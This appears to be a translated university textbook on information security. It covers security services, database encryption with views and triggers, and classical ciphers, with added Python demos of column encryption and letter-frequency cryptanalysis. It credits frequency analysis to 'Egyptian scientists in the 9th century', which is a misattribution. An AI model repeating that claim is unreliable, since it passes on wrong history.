

UNIVERSITY OF ECONOMICS - TECHNOLOGY FOR INDUSTRIES
FACULTY OF INFORMATION TECHNOLOGY
DEPARTMENT OF COMPUTER ENGINEERING

COURSE TEXTBOOK

INFORMATION SAFETY AND SECURITY

Hanoi, 8-2010


Preface

Recently the course "Information Safety and Security" has been introduced in most Faculties of Information Technology at universities and colleges. Because applications on the Internet keep growing and expanding, network information security has become a mandatory requirement for every application system. To meet the study and self-study needs of students in the Information Technology majors, the Department of Computer Science, Faculty of Information Technology, organized the writing of this textbook. Its content is based on several sources, but mainly on Professor William Stallings's book "Cryptography and Network Security: Principles and Practice", which is used as teaching material at many universities. The textbook has also been refined step by step from the author's lectures to the last four intakes of students of the Faculty of Information Technology.

With the aim of providing just enough foundational knowledge and helping students understand the nature of the security aspects of networks, the author has tried to present the basic theory concisely and to give practical applications. The textbook has 8 chapters. The first chapter gives an overview of security, chapter 2 briefly summarizes classical ciphers, chapter 3 presents the basic concepts of arithmetic fields, chapter 4 introduces block ciphers and the data encryption standard, chapter 5 covers public-key ciphers and RSA, chapter 6 introduces authentication and hash functions, chapter 7 presents applications in Web and IP security, and finally chapter 8 summarizes intruders and firewall countermeasures.

As this is a first edition written without much practical experience, certain mistakes and printing errors are unavoidable. The author gladly welcomes all contributions that help make the textbook "Information Safety and Security" better.

TABLE OF CONTENTS

PREFACE

CHAPTER I OVERVIEW OF SECURITY
I.1 General introduction to information security
I.2 Services, mechanisms, attacks
I.3 Network security model
I.4 Information security in database systems

CHAPTER II CLASSICAL CIPHERS
II.1 Symmetric ciphers
II.2 Classical substitution ciphers
II.3 Classical transposition ciphers
II.4 Other issues

CHAPTER III ARITHMETIC FIELDS
III.1 Algebraic structures
III.2 Modular arithmetic
III.3 Galois fields
III.4 Introduction to number theory

CHAPTER IV BLOCK CIPHERS AND THE DATA ENCRYPTION STANDARD
IV.1 Modern block ciphers
IV.2 The Data Encryption Standard (DES)
IV.3 The Advanced Encryption Standard (AES)
IV.4 Contemporary symmetric ciphers
IV.5 Confidentiality using symmetric ciphers

CHAPTER V PUBLIC KEYS AND RSA
V.1 Public-key ciphers
V.2 RSA
V.3 Key management
V.4 Diffie-Hellman key distribution
V.5 Elliptic curve ciphers

CHAPTER VI MESSAGE AUTHENTICATION AND HASH FUNCTIONS
VI.1 Message authentication
VI.2 Hash functions
VI.3 Hash and MAC algorithms
VI.4 Authentication applications

CHAPTER VII IP AND WEB SECURITY
VII.1 IP security
VII.2 Web security
VII.3 Secure electronic payment
VII.4 E-mail security

CHAPTER VIII INTRUDERS AND FIREWALLS
VIII.1 Intruders
VIII.2 Malicious software
VIII.3 Buffer overflow
VIII.4 Firewalls

LIST OF SYMBOLS AND ABBREVIATIONS
Appendix

CHAPTER I OVERVIEW OF SECURITY

I.1 General introduction to information security

I.1.1 Introduction to information security

Today, with the explosive growth of information technology, most business information, such as business strategy and information about customers, suppliers, finances and employee salaries, is stored on computer systems. As a business grows, the ever higher demands of the business environment require it to share its information with many different parties over the Internet or an intranet. Loss or leakage of information can seriously affect the company's finances, its reputation and its relations with customers. Attack methods over the network are increasingly sophisticated and complex; they can lead to loss of information and can even bring down the business's information system completely. Information safety and security is therefore a very heavy task that is hard to predict in advance, but in essence it covers three main directions:

- Ensuring information security at the server
- Ensuring security on the client side
- Securing information in transit

Faced with the need to secure information, besides building methods for securing information, the following data protection principles have been set out:

- Principle of lawfulness in collecting and processing data.
- Principle of correctness.
- Principle of fitness for purpose.
- Principle of proportionality.
- Principle of transparency.
- Principle of co-determination for each individual and guaranteed access rights for the persons concerned.
- Principle of non-discrimination.
- Principle of security.
- Principle of accountability before the law.
- Principle of independent supervision and sanctions under the law.
- Principle of an equivalent level of protection in cross-border data transfers.

Here we concentrate on examining security needs, proposing security measures and operating the mechanisms that achieve those goals.

The need for information security:

Information security has changed a great deal in recent times. Previously there was almost only a need for confidentiality; now many new requirements are added, such as server security and network security. Traditional methods were provided by administrative mechanisms and physical means, such as protected storage for important documents and the issuing of permits to use those secret documents.

Computers require automated methods to protect files and stored information. The need for security is very large and very diverse, and it is present everywhere and at all times. Automated procedures that support information security are therefore indispensable. The use of networks and communications requires means of protecting data in transit. These include both software and hardware means, and they call for new research to meet the practical problems that arise.

Concepts:

- Computer security: the set of tools designed to protect data and to thwart hackers.
- Network security: the means of protecting data while it is transmitted.
- Internet security: the means of protecting data while it is transmitted over a collection of interconnected networks.

The aim of the course is to concentrate on Internet security, covering the means to protect against, deter, detect and correct security violations during the transmission and storage of information.

I.1.2 Risks and threats to information systems

Threats to a system can be classified as accidental or intentional, and as active or passive.

- Accidental threat: when users restart the system in privileged mode they can modify the system at will. If they do not switch the system back to normal mode after finishing the work, they unintentionally leave it open to abuse.
- Intentional threat: for example, deliberately gaining unauthorized access to the system.
- Passive threat: a threat that has not yet acted, or does not act, directly on the system, such as eavesdropping on packets on the transmission line.
- Active threat: modifying information, or changing the state or operation of the system.

For every information system the threats and their potential consequences are very large. They can arise from the following causes:

- From the users: unauthorized intrusion, theft of valuable assets.
- In the architecture of the information system: a technical organization that has no structure or is not strong enough to protect information.
- In the information security policy itself: failure to follow security standards, and no clear definition of rights in operating the system.
- Information in a computer system is also easily compromised if there are no tools to manage, check and control the system.
- The risk lies in the hardware structure of the computing devices themselves and in system and application software, where the manufacturer has pre-installed electronic 'bugs' with a predetermined intent, known as 'electronic bombs'.
- The greatest danger to open computer networks is hackers, from the criminal side.

I.1.3 Classification of attacks on security:


Systems on a network can be the target of many kinds of attack:

- A masquerade attack is one in which an attacking entity impersonates another entity. Masquerade attacks are usually combined with other forms of attack such as replay and message modification.
- A replay attack occurs when a message, or part of a message, is sent many times, causing negative effects.
- A message modification attack occurs when the content of a message is altered without being detected.
- A denial-of-service attack occurs when an entity does not perform its function and so prevents other entities from performing theirs.
- An attack from inside the system occurs when a legitimate user, deliberately or inadvertently, interferes with the system without authorization. An attack from outside consists of eavesdropping, interception, impersonating a legitimate user, and exceeding privileges or bypassing access control mechanisms.

Passive attacks. Spying on and monitoring the transmission line in order to:
o obtain the content of messages, or
o monitor the traffic flow.

Active attacks. Changing the data flow in order to:
o impersonate someone,
o replay an earlier message,
o modify a message in transit,
o deny service.

I.2 Services, mechanisms, attacks

Practical needs lead to the necessity of a systematic method for determining an organization's security requirements. This calls for an overall approach that considers all three aspects of information security: protection against attacks, security mechanisms and security services. Below we consider them in reverse order:

I.2.1 Security services

These are the tools that ensure the security of an organization's information processing and information transfer systems. They are set up to counter attacks. One or more security mechanisms can be used to provide a service. Usually one needs to mirror what is associated with physical documents: having signatures and dates; having the necessary protection against disclosure, tampering and destruction; being notarized or witnessed; being recorded or licensed.

I.2.2 Security mechanisms

From the practical work of countering security violations, people have systematized and organized the measures into different security mechanisms. A mechanism is designed to detect, prevent or recover from an attack. No single mechanism meets every function that security work requires. There is, however, one special component that lies in every security mechanism: cryptographic techniques. We will therefore devote a certain amount of time to the theory of ciphers.

I.2.3 Security attacks

We define clearly what actions count as attacks on security: every action that works against the information security of organizations. Information security is about how to counter attacks on information systems or to detect them. In practice there are very many ways and many kinds of attack. The terms threat and attack are often used interchangeably. We need to concentrate on countering the main kinds of attack: passive and active.

I.3 Network security model

I.3.1 Security architecture of the OSI open communication system

To help plan policy and build a good security system, the standardization sector of the international telecommunication organization (International Telecommunication Union) studied and proposed the X.800 security architecture for the OSI open systems interconnection. It defines in a systematic way the method for determining and providing security requirements. It gives us a useful, general view of the concepts we study.

First, regarding security services, X.800 defines a security service as a service provided by a protocol layer of communicating open systems that ensures the necessary information security of the systems and of the data transfers. The document of standard Internet terms, RFC 2828, gives a more specific definition: a security service is a processing or communication service that gives a system special protection for its information resources. X.800 defines the services in 5 main categories:

- Authentication: assurance that the communicating entity is the one it claims to be. The party stating its name to us really is that party; nobody else is allowed to impersonate it.
- Access control: preventing the use of an information resource outside the proper role. Each subject in the system is given certain rights and may act only within those rights.
- Data confidentiality: protecting data from disclosure to unauthorized persons. For example, other symbols are used to replace the symbols in the message, and only an authorized person can restore the original.
- Data integrity: assurance that the data was sent by an authorized party. If there is a change, such as a delay in time or a modification of the information, authentication gives a way to check and recognize that this has happened.
- Non-repudiation: protection against denial by one of the parties to the exchange. The sender cannot deny having sent information with that content, and the receiver cannot falsely claim not to have received it. This is essential in everyday exchanges and agreements.

Security mechanisms are defined in X.800 as follows:

- Specific security mechanisms, implemented in a protocol of some particular layer: encipherment, digital signatures, access control, data integrity, authentication exchange, traffic padding, routing control, notarization.
- Pervasive security mechanisms, not specific to a protocol at any particular layer or to any particular security service: trusted functionality with respect to some criterion, security labels indicating that an object has certain attributes, event detection, security audit trails, security recovery.

I.3.2 General network security model

Using the model above requires us to:
o design a suitable algorithm for the secure transmission,
o generate the secret information (keys) used by the algorithm,
o develop methods for distributing and sharing the secret information,
o specify a protocol that lets the parties use the transmission and the secret information for the security services.

Model for secure network access:


Using the model above requires us to:
o select a suitable gatekeeper function for identified users,
o implement access controls to ensure that only authorized persons can access the target information or resources.
o Trusted computer systems can use this model.

I.4 Information security in database systems

I.4.1 General introduction

Today's database systems such as Oracle, SQL/Server and DB2/Informix all come with standard protection tools such as identification systems and access control. These protections, however, are almost useless against attacks from the inside. To protect information from this threat, two solutions have been proposed.

The simplest solution protects the data in the database at file level, using encryption to prevent unauthorized access to the database files. This solution, however, does not provide access security at the level of tables, columns and rows. Another weakness is that anyone with the right to access the database can access all the data in it, which also means that subjects with administrative rights can access all sensitive data.

The second solution handles encryption at application level. It encrypts the data before the data is passed to the database. Key management and access rights are supported by the application. A query to the database returns data in encrypted form, and the application decrypts it. This solution solves the problem of separation of security duties and supports role-based security policies.

I.4.2 Some database security models

To meet the security requirements of current and future database systems, the following two common database security models have been proposed.

Building an intermediary database layer:

An intermediary database is built between the application and the original database. The intermediary database encrypts data before it is written to the original database and decrypts data before it is given to the application. It also provides additional functions for key management, user authentication and access authorization.

This solution makes it possible to add many security functions to the database. However, the intermediary database model requires building a database application that reproduces all the functions of the original database.

(Figure: the intermediary model)

Using mechanisms already available in the database:

This model solves column encryption using the following mechanisms:
a. Stored Procedure functions in the database for encryption and decryption.
b. The View mechanism in the database, used to create virtual tables that replace the real, encrypted tables.
c. The "instead of" trigger mechanism, used to automate encryption from the View down to the base table.

In this model the data in the base tables is encrypted and the base tables are renamed. A virtual table carrying the name of the base table is created, and the application accesses this virtual table. Data access in this model can be summarized as follows:

(Figure: the virtual table model)

Data accesses to the base table are replaced by accesses to the virtual table. The virtual table is created to mirror the data in the base table. When a "select" statement is executed, the data is decrypted for the virtual table from the (encrypted) base table. When an "Insert" or "Update" statement is executed, the "instead of" trigger fires and encrypts the data down into the base table.

Access rights to the columns are managed on the virtual tables. In addition to the basic rights provided by the database, two new access rights are defined:
1. The user may only read the data in encrypted form. This right suits those who need to administer the database without reading the content of the data.
2. The user may read the data in decrypted form.

I.4.3 Outline of the architecture of a database security system

Triggers: triggers are used to capture the data coming from INSERT and UPDATE statements (for encryption).

Views: views are used to capture the data coming from SELECT statements (for decryption).

Extended Stored Procedures: called from the Triggers or Views to invoke the services provided by the DBPEM module from within the environment of the database management system.

DBPEM (Database Policy Enforcing Modulo): provides encryption/decryption services for the data sent from the Extended Stored Procedures and checks the user's access rights (based on the security policies stored in the security database).


(Figure: architecture of a database security system)

Security Database: stores the security policies and the decryption keys. The current trend is to store this security database in Active Directory (a directory-style database that stores all information about the network system).

Security Services: mainly protect the decryption keys stored in the security database.

Management Console: used to update the information stored in the security database (mainly editing the security policies) and to carry out the operation of protecting a given field in the database, so as to ensure maximum confidentiality of the information exchanged.
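The virtual-table model of I.4.2 (encryption and decryption functions, a view carrying the original table name, "instead of" triggers) can be tried out with SQLite from Python. This is an added example, not code from the textbook. The names employee, employee_enc, enc_col and dec_col, the demo key and the SHA-256 keystream standing in for the cipher are assumptions of the example; a deployment would use a vetted authenticated cipher and a key held by the security services.

```python
import hashlib
import os
import sqlite3

# Constructed demo key. In the architecture above the key is kept in the
# security database and protected by the security services, not in code.
DEMO_KEY = b"constructed-demo-key-not-for-real-use"


def _keystream(nonce, length):
    """SHA-256 in counter mode, used only as a stand-in cipher for the demo."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(DEMO_KEY + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def enc_col(value):
    """Encryption function called by the triggers: plaintext -> BLOB."""
    data = str(value).encode("utf-8")
    nonce = os.urandom(8)
    return nonce + bytes(a ^ b for a, b in zip(data, _keystream(nonce, len(data))))


def dec_col(blob):
    """Decryption function called by the view: BLOB -> plaintext string."""
    nonce, body = blob[:8], blob[8:]
    plain = bytes(a ^ b for a, b in zip(body, _keystream(nonce, len(body))))
    return plain.decode("utf-8")


SCHEMA = """
-- Base table: renamed, with the sensitive column stored encrypted.
CREATE TABLE employee_enc (id INTEGER PRIMARY KEY, name TEXT, salary_enc BLOB);

-- Virtual table: carries the original name and decrypts on SELECT.
CREATE VIEW employee AS
    SELECT id, name, CAST(dec_col(salary_enc) AS INTEGER) AS salary
    FROM employee_enc;

-- "Instead of" triggers: encrypt on the way down to the base table.
CREATE TRIGGER employee_ins INSTEAD OF INSERT ON employee
BEGIN
    INSERT INTO employee_enc (id, name, salary_enc)
    VALUES (NEW.id, NEW.name, enc_col(NEW.salary));
END;

CREATE TRIGGER employee_upd INSTEAD OF UPDATE ON employee
BEGIN
    UPDATE employee_enc
       SET name = NEW.name, salary_enc = enc_col(NEW.salary)
     WHERE id = OLD.id;
END;
"""


def open_protected_db():
    """In-memory database with the functions, view and triggers installed."""
    conn = sqlite3.connect(":memory:")
    # The view and triggers call application-defined functions, which SQLite
    # only allows inside schema objects when the schema is trusted.
    conn.execute("PRAGMA trusted_schema = ON")
    conn.create_function("enc_col", 1, enc_col)
    conn.create_function("dec_col", 1, dec_col)
    conn.executescript(SCHEMA)
    return conn


def demo():
    """Write through the virtual table, then read it and the base table."""
    conn = open_protected_db()
    conn.execute("INSERT INTO employee (id, name, salary) VALUES (1, 'An', 1500)")
    conn.execute("UPDATE employee SET salary = 1800 WHERE id = 1")
    decrypted = conn.execute("SELECT name, salary FROM employee").fetchall()
    stored = conn.execute("SELECT salary_enc FROM employee_enc").fetchone()[0]
    return decrypted, stored


if __name__ == "__main__":
    rows, blob = demo()
    print("via virtual table:", rows)
    print("in base table    :", blob.hex())
```

Reading employee_enc corresponds to the first access right (encrypted form only) and reading employee to the second; SQLite has no GRANT statement, so enforcing who may use which is left to the surrounding system.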


CHAPTER II CLASSICAL CIPHERS

Classical encryption is the simplest method of encryption and the first to appear in the history of cryptography. The algorithms are simple and easy to understand. These methods are the basis for the study and development of the symmetric encryption algorithms used today. Two methods stand out in classical encryption:

- Substitution ciphers
- Transposition ciphers

Every classical cipher is a symmetric cipher, which we consider in the next section.

II.1 Symmetric ciphers

II.1.1 Basic concepts

A symmetric cipher uses the same key for encryption and decryption. A symmetric cipher can also be called a single-key cipher, a private-key cipher or an agreed-key cipher. Here the sender and the receiver share a common key K, which they can exchange with each other in secret. We consider two mutually inverse functions: E is the function that transforms plaintext into ciphertext, and D is the function that transforms ciphertext back into plaintext. Suppose X is the text to be encrypted and Y is the form of the text after encryption. We then write:

Y = E_K(X)
X = D_K(Y)

Every classical cipher algorithm is a symmetric-key cipher, because the information about the key is shared between the sender and the receiver. Symmetric ciphers were the only kind before the invention of public-key ciphers (also called asymmetric ciphers) in the 1970s. Today both symmetric and public-key ciphers continue to be developed and refined. Public-key ciphers were introduced to support symmetric ciphers, not to replace them, so symmetric ciphers are still widely used.

We now define some basic concepts of encryption.

1. The plaintext X is the original message. The plaintext may be divided into pieces of suitable size.
2. The ciphertext Y is the original message after encryption. Here we usually consider encryption methods that do not change the size of the plaintext, that is, the two have the same length.
3. The cipher is the algorithm E that turns plaintext into ciphertext. We normally need a strong encryption algorithm: even if the adversary knows the algorithm, without the key information the plaintext cannot be found.
4. The key K is the parameter information used for encryption, known only to the sender and the receiver. The key is independent of the plaintext and has a length suited to the security requirement.
5. Encryption is the process of turning plaintext into ciphertext; it usually consists of applying the encryption algorithm together with some accompanying information processing.
6. Decryption turns ciphertext into plaintext; it is the reverse of encryption.
7. Cryptography is the branch of Computer Science that studies the principles and methods of encryption. Many security standards have now been issued for different fields of information technology.

8. Cryptanalysis studies the principles and methods of decryption without knowing the key. Usually, when strong ciphers are put forward as standards shared among users, those ciphers are studied by cryptanalysts as well as by cipher developers, who investigate methods for solving part of the ciphertext from incomplete information.
9. Cryptology covers both cryptography and cryptanalysis. It is a unified whole: to judge whether a cipher is strong or not, it must be examined from both sides. Scientists hope to find highly general encryption models that satisfy many different security policies.

(Figure: symmetric cipher model)

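II.1.2 Requirements

A symmetric cipher is characterized by the way the encryption and decryption algorithms process information, by the effect of the key on the ciphertext and by the length of the key. The more complex the relationship between plaintext, key and ciphertext the better, provided the computation speed is acceptable. Specifically, the two requirements for the secure use of a symmetric-key cipher are:

1. A strong encryption algorithm. It has a solid mathematical foundation which ensures that, although the algorithm is public and known to everyone, cryptanalysis is very difficult and complex without the key.
2. A secret key known only to the sender and the receiver. There is a secure channel for distributing the key among the users who share it. The relationship between the key and the ciphertext cannot be recognized.

II.1.3 Cryptography

A cryptographic system is characterized by the following factors:

- The type of encryption operation applied to the plaintext:
  1. Substitution: replacing the characters of the plaintext by other characters.
  2. Transposition: changing the positions of the characters in the plaintext, that is, permuting the characters of the plaintext.
  3. Product of the two, that is, combining both substitution and transposition of the characters of the plaintext.
- The number of keys used in encryption: a single key (private key) or two keys (public key). One also considers whether many keys are used.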

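- A further characteristic of a cipher is the way in which the plaintext is processed:
  1. Block: the data is divided into blocks of fixed size and the encryption algorithm, with the key as parameter, is applied to each block.
  2. Stream: each input element is processed continuously to produce the corresponding output element.

II.1.4 Cryptanalysis

There are two approaches to attacking a symmetric cipher.

1. Cryptanalytic attack, based on the algorithm and some information about the general characteristics of the plaintext, or on some plaintext/ciphertext samples. This kind of attack aims to exploit the characteristics of the algorithm to find a specific plaintext or to find the key. If the key is found, it is a major disaster.
2. Exhaustive attack: the attacker tries every possible key on the ciphertext until the plaintext is obtained. On average half of the keys must be tried before the right one is found.

Types of cryptanalytic attack:

- Ciphertext only: knowing the algorithm and the ciphertext, use statistical methods to determine the plaintext.
- Known plaintext: knowing the algorithm and some ciphertext/plaintext, attack to find the key.
- Chosen plaintext: choose plaintext and obtain its ciphertext; knowing the algorithm, attack to find the key.
- Chosen ciphertext: choose ciphertext and obtain the corresponding plaintext; knowing the algorithm, attack to find the key.
- Chosen text: choose either plaintext or ciphertext and have it encrypted or decrypted accordingly; attack to find the key.

II.1.5 Exhaustive search (Brute-Force)

In theory exhaustive search can always be carried out, because one can try the keys one by one and the number of keys is finite. Most of the effort of the attacks is proportional to the key size. The longer the key, the longer the search takes, and it usually grows exponentially. We can assume that the cryptanalyst can rely on context to know or recognize the plaintext.

Below are some statistics on the relationship between key length, key space size, processing speed and exhaustive search time. We see that for key lengths of 128 bits and above the required time is very large, up to billions of years, so the exhaustive search method can be regarded as impractical.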


II.1.6 Security

Security can be classified into two kinds:

- Unconditional security: here it does not matter how powerful the computer is or how many operations per second it can perform; the cipher cannot be broken, because the ciphertext does not provide enough information to determine the plaintext uniquely. Using a one-time random pad as a stream cipher for the data, which we consider at the end of this lesson, is regarded as unconditionally secure. Apart from that, no encryption algorithm is regarded as unconditionally secure.
- Computational security: with limited computing resources and limited time (for example, computation time not exceeding the age of the universe) the cipher is regarded as unbreakable. In this case the encryption is regarded as computationally secure.

In general, from now on, an encryption algorithm that is computationally secure is regarded as secure.

II.2 Classical substitution ciphers

There are two kinds of classical cipher: substitution ciphers and transposition ciphers (also called permutation ciphers). A substitution cipher is a method in which each character (or group of characters) of the plaintext is replaced by another character (or group of characters) to produce the ciphertext. The receiver only has to reverse the substitution on the ciphertext to obtain the original plaintext.

In a transposition cipher the characters of the plaintext are kept as they are; only their positions are rearranged to produce the ciphertext. That is, the characters of the plaintext are not changed into other characters at all, only moved around to form the ciphertext.

First we consider the classical ciphers that replace the letters of the plaintext by other letters of the alphabet to form the ciphertext.

- Here the letters of the plaintext are replaced by letters, numbers or other symbols.
- Or, if the plaintext is viewed as a sequence of bits, the substitution replaces plaintext bit patterns by ciphertext bit patterns.

II.2.1 The Caesar cipher

This is the earliest known substitution cipher, created by Julius Caesar. It was first used in military affairs. Encryption simply replaces each letter of the plaintext by the letter three places further on in the alphabet. Example:

o Meet me after the toga party
o PHHW PH DIWHU WKH WRJD SDUWB

Here the letter m is replaced by the third letter after m, which is p (m, n, o, p); the letter e is replaced by the third letter after e, which is h (e, f, g, h). The encryption can be defined by the following mapping on the alphabet, in which the letters of the lower row are the codes of the corresponding letters of the upper row:

a b c d e f g h i j k l m n o p q r s t u v w x y z
D E F G H I J K L M N O P Q R S T U V W X Y Z A B C

Mathematically, we assign a number to each letter of the alphabet. The letters of the upper row have the corresponding numbers in the lower row:

a  b  c  d  e  f  g  h  i  j  k  l  m
0  1  2  3  4  5  6  7  8  9  10 11 12

n  o  p  q  r  s  t  u  v  w  x  y  z
13 14 15 16 17 18 19 20 21 22 23 24 25

The Caesar cipher is then defined by shifting the letters as follows:

c = E(p) = (p + k) mod 26
p = D(c) = (c - k) mod 26

Here p is the number of the letter in the plaintext and c is the number of the corresponding letter of the ciphertext; k is the key of the Caesar cipher. There are 26 different values of k, so there are 26 different keys. In practice the key length here is only 1, because every letter is shifted by the same amount.

Cryptanalysis of the Caesar cipher is simple, because the number of possible keys is very small. There are only 26 possible keys, since A can map only to one of the 26 letters of the English alphabet: A, B, C, ... The other letters are then determined by the same shift as A. The cryptanalyst can try the keys one after another, that is, use exhaustive search. Because there are so few keys, the search is feasible. Given a ciphertext, we try the 26 different shifts and recognize the right one from the content of the resulting plaintexts.

Example. Breaking the ciphertext "GCUA VQ DTGCM" by trying the different shifts of the alphabet, we find that the appropriate shift is 24, which gives the plaintext "easy to break".

II.2.2 Monoalphabetic ciphers

We now overcome the weakness of the Caesar cipher by encrypting the letters not just by shifting the alphabet but by allowing different jumps for different letters. In such a cipher each letter of the plaintext is mapped to a different letter of the ciphertext. Each such encryption therefore corresponds to a permutation of the alphabet, and that permutation is the key of the cipher. The key length here is thus 26 and the number of possible keys is 26!. That number of keys is very large.

Example. The ciphertext corresponding to a plaintext under a monoalphabetic cipher is as follows:

Plain:      abcdefghijklmnopqrstuvwxyz
Cipher:     DKVQFIBJWPESCXHTMYAUOLRGZN
Plaintext:  ifwewishtoreplaceletters
Ciphertext: WIRFRWAJUHYFTSDVFSFUUFYA

- Security of the monoalphabetic cipher. In total there are 26!, approximately 4 x 10^26, keys. With so many keys, many people think that a monoalphabetic cipher will be secure. But that is not so. The problem lies in the characteristics of the language. Although the number of keys is large, the frequency characteristics of the letters in the plaintext and of the corresponding letters in the ciphertext are the same, so the cryptanalyst can guess the mapping of some letters and from there work out the cipher letters for the others. We examine this aspect in detail in the next section.

- Language redundancy and cryptanalysis. Human languages are redundant. Some letters, pairs of letters or triples of letters are used more often than other groups of the same length. Consider, for example, the following letter groups in English: "th lrd s m shphrd shll nt wnt". In short, in many languages the letters are not used equally often. In English the letter E is used most; after it come the letters T, R, N, I, O, A, S. Some letters are used very rarely, such as Z, J, K, Q, X. By statistical methods we can build frequency tables for single letters, pairs of letters and triples of letters.

(Figure: table of English letter frequencies)

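Using the frequency table in cryptanalysis

The important point is that a monoalphabetic substitution cipher does not change the relative frequencies of the letters, which means that we still have the frequency table above, but for the corresponding cipher alphabet. This was discovered by Egyptian scientists in the 9th century. The method for cryptanalysing a monoalphabetic cipher is therefore as follows:

- Compute the frequencies of the letters in the ciphertext.
- Compare them with the known values.
- Look for the commonly used single letters A-I-E, the pair NO and the triple RST, and for the rarely used groups JK, X-Z.
- For a monoalphabetic cipher, identify the letters with the help of the tables of pairs and triples.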
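The first steps of this procedure can be automated. The following is an added example, not code from the textbook: it counts letters and letter pairs in the ciphertext of the example that follows (copied as printed there), and uses the substitution key from II.2.2 to check that a monoalphabetic cipher leaves the frequency profile unchanged. All function names are assumptions of the example.

```python
from collections import Counter

# Ciphertext exactly as printed in the example after this list (spaces removed).
CIPHERTEXT = (
    "UZQSOVUOHXMOPVGPOZPEVSGZWSZOPFPESXUDBMETSXAIZ"
    "VUEPHZHMDZSHZOWSFPAPPDTSVPQUZWYMXUZUHSXEPYEP"
    "OPDZSZUFPOUDTMOHMQ"
)

# Key from the substitution example in II.2.2 (plain a..z -> cipher letters).
CIPHER_ALPHABET = "DKVQFIBJWPESCXHTMYAUOLRGZN"


def letters(text):
    """Upper-case letters of `text`; everything else is dropped."""
    return [ch for ch in text.upper() if "A" <= ch <= "Z"]


def ngram_counts(text, n=1):
    """Count overlapping groups of n letters (1 = letters, 2 = pairs, 3 = triples)."""
    seq = letters(text)
    return Counter("".join(seq[i:i + n]) for i in range(len(seq) - n + 1))


def ranked(text, n=1, top=5):
    """Most frequent groups as (group, count, percent); ties in alphabetical order."""
    counts = ngram_counts(text, n)
    total = sum(counts.values())
    order = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return [(g, c, round(100.0 * c / total, 1)) for g, c in order[:top]]


def substitute(plaintext, cipher_alphabet=CIPHER_ALPHABET):
    """Monoalphabetic encryption: letter number i becomes cipher_alphabet[i]."""
    return "".join(cipher_alphabet[ord(ch) - ord("A")] for ch in letters(plaintext))


def frequency_profile(text):
    """Letter counts from high to low, ignoring which letter owns which count."""
    return sorted(ngram_counts(text).values(), reverse=True)


def apply_guess(ciphertext, guess):
    """Partial plaintext implied by a guess such as {'P': 'e', 'Z': 't'}."""
    return "".join(guess.get(ch, ".") for ch in letters(ciphertext))


if __name__ == "__main__":
    print("letters:", ranked(CIPHERTEXT, 1))
    print("pairs  :", ranked(CIPHERTEXT, 2))
    # The two most frequent cipher letters are the natural candidates for e and t.
    print(apply_guess(CIPHERTEXT, {"P": "e", "Z": "t", "W": "h"}))
    plain = "ifwewishtoreplaceletters"
    print(frequency_profile(plain) == frequency_profile(substitute(plain)))
```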

Example. Cryptanalysis of a monoalphabetic ciphertext. Given the ciphertext:

UZQSOVUOHXMOPVGPOZPEVSGZWSZOPFPESXUDBMETSXAIZ
VUEPHZHMDZSHZOWSFPAPPDTSVPQUZWYMXUZUHSXEPYEP
OPDZSZUFPOUDTMOHMQ

- Compute the frequencies of the letters.
- Guess that P and Z are e and t.
- Then ZW is th and ZWP is the.
- Continuing the reasoning, we obtain the plaintext: it was disclosed yesterday that several informal but direct contacts have been made with political representatives in moscow

II.2.3 The Playfair cipher

As we have seen, the large number of keys of a monoalphabetic cipher does not guarantee its security. One way to improve on it is to encrypt groups of letters, so that each letter is encrypted as one of several different letters depending on the letters next to it. Playfair is one such cipher; it was created by Charles Wheatstone in 1854 and bears the name of his friend Baron Playfair. Here each letter can be encrypted as one of 7 different letters, depending on the letter paired with it in the plaintext.

The Playfair key matrix. A word is given as the key, on condition that no letter is repeated in the keyword. We build the Playfair matrix as a 5 x 5 matrix based on the given keyword and containing the letters of the alphabet, arranged in the following order:

- First write the letters of the keyword into the rows of the matrix, starting from the first row.
- If the matrix still has empty cells, write the letters of the alphabet that have not yet been used into the remaining cells. They can be written in an agreed order, for example from the beginning of the alphabet to the end.
- Since the English alphabet has 26 letters, one cell is missing. Usually two letters are put together in one cell, for example I and J.
- Suppose the keyword MONARCHY is used. The corresponding Playfair key matrix is:

M O N A R
C H Y B D
E F G I K
L P Q S T
U V W X Z

Encryption and decryption: the plaintext is encrypted 2 letters at a time according to the following rules:

- Divide the plaintext into pairs of letters. If a pair consists of two identical letters, insert a filler letter such as X. For example, before encryption "balloon" becomes "ba lx lo on".
- If both letters of the pair fall in the same row, encrypt each letter as the letter to its right in the same row of the key matrix (wrapping round from the end to the beginning); for example "ar" becomes "RM".
- If both letters of the pair fall in the same column, encrypt each letter as the letter below it in the same column of the key matrix (wrapping round from the end to the beginning); for example "mu" becomes "CM".
- In all other cases, each letter of the pair is encrypted as the letter in its own row and in the column of the other letter of the pair in the key matrix. For example, "hs" is encrypted as "BP", and "ea" as "IM" or "JM" (as preferred).

Security of the Playfair cipher:

- Security is improved compared with the monoalphabetic cipher, because there are 26 x 26 = 676 pairs in total. Each letter can be encrypted as 7 different letters, so the letter frequencies of the ciphertext differ from the letter frequencies of English text in general.
- To use frequency statistics, a frequency table of 676 pairs is needed for cryptanalysis (compared with 26 for the monoalphabetic cipher). Many more cases therefore have to be examined, and correspondingly there may be many more ciphertexts to choose among. It is therefore harder to cryptanalyse than a monoalphabetic cipher.
- The Playfair cipher was widely used for many years by the US and British military in the First World War. It can be broken given a few hundred letters, because the ciphertext still contains much of the structure of the plaintext.

II.2.4 Polyalphabetic ciphers

Another way to increase the security of alphabet-based ciphers is to use several cipher alphabets. We call these polyalphabetic substitution ciphers. Here each letter can be encrypted as any letter in the ciphertext, depending on the context at the time of encryption. The purpose is to flatten the frequencies of the letters appearing in the ciphertext. This removes some of the structure of the plaintext that shows in the ciphertext and makes cryptanalysis of a polyalphabetic cipher harder.

A keyword is used to specify which alphabet is used for each letter of the message. The alphabets are used in turn according to the keyword, starting again from the beginning when the keyword is exhausted. The key length is the period with which the alphabets repeat. The longer the keyword and the more different letters it uses, the harder the cryptanalysis.

II.2.5 The Vigenere cipher

The simplest polyalphabetic substitution cipher is the Vigenere cipher. In essence, Vigenere encryption applies several Caesar ciphers to the plaintext at the same time, with different keys. The key used to encrypt each letter depends on the position of that letter in the plaintext and is taken from the keyword in the corresponding order.

